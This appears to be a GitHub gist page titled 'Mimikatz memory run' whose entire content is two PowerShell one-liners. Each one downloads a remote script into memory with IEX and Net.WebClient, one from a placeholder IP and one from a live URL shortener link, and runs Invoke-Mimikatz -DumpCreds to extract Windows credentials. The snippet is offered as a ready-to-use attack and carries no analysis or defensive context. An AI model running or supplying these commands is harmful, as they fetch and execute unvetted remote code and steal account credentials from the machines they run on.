Skip to content

Instantly share code, notes, and snippets.

@ivanvza
Last active August 8, 2022 23:21
Show Gist options
  • Save ivanvza/66a7a6016457c5a4ab56918971b2fd2e to your computer and use it in GitHub Desktop.
Save ivanvza/66a7a6016457c5a4ab56918971b2fd2e to your computer and use it in GitHub Desktop.
Mimikatz memory run
powershell "IEX (New-Object Net.WebClient).DownloadString('http://<IP>/<mimikatz location>'); Invoke-Mimikatz -DumpCreds"
---
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment